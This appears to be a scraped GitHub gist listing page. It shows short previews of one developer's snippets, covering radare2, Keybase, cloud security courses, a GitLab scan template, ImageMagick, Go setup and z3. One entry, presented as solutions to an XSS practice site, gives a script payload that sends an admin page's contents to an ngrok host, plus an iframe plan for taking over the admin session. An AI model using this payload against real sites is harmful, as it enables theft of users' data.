Radare2: https://gist.github.com/williballenthin/6857590dab3e2a6559d7
I hereby claim:
- I am diofeher on github.
- I am diofeher (https://keybase.io/diofeher) on keybase.
- I have a public key ASBWvH2xuFlSBLsOhpaKe7L73dj0SCd5TpyUz2EMkLgbDQo
To claim this, I am signing this object:
Use the following doc: https://docs.github.com/en/developers/apps/building-github-apps/creating-a-github-app
- Needed Permissions
Courses
- https://www.coursera.org/specializations/security-google-cloud-platform
- https://www.coursera.org/professional-certificates/google-cloud-security
- https://www.coursera.org/specializations/networking-google-cloud-platform
- https://www.coursera.org/professional-certificates/google-cloud-networking
- https://www.coursera.org/learn/cloud-infrastructure-design-process/home/welcome In this course there's a section of security.
Practice Exams:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{{- /* Template based on https://docs.gitlab.com/ee/user/application_security/container_scanning/#reports-json-format */ -}} | |
{ | |
"version": "11.0.0", | |
"vulnerabilities": [ | |
{{- $t_first := true }} | |
{{- range . }} | |
{{- $target := .Target }} | |
{{- range .Vulnerabilities -}} | |
{{- if $t_first -}} | |
{{- $t_first = false -}} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# concatenate two images with different sizes | |
convert image1.jpeg image2.jpeg -gravity Center -resize 800x200 +append output.jpeg |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Installing Go environment on MAC + Visual Studio Code + Oh my ZSH | |
brew install go | |
cat <<EOT >> $HOME/.zshrc | |
export GOROOT="/usr/local/Cellar/go/1.14.4/libexec/" | |
export GOPATH="$HOME/workspace/go" | |
export PATH="${PATH}:${GOPATH}:${GOPATH}/bin" | |
EOT | |
source $HOME/.zshrc |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from z3 import Solver, Ints, Or, And, Not, sat | |
x, y, z = Ints('x y z') | |
s = Solver() | |
s.add(x >= 0, x <= 9) | |
s.add(y >= 0, y <= 9) | |
s.add(z >= 0, z <= 9) |
First - XSS on the User
<http://g<!s://q?<!-<[<script>top.admin.location='https://196cffb1.ngrok.io/?data='+JSON.stringify(top.admin.document.getElementsByClassName('is-4')[0].textContent.trim());/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(13);/*](http://g)->a>
Second - Create a page with two iframes. With one, you stay with the admin logged in and with the other one:
- Log out
- Login with your XSS user
- Control the admin iframe with XSS and exfiltrate the data
Solutions of https://xss.pwnfunction.com/
Dom-Based XSS
NewerOlder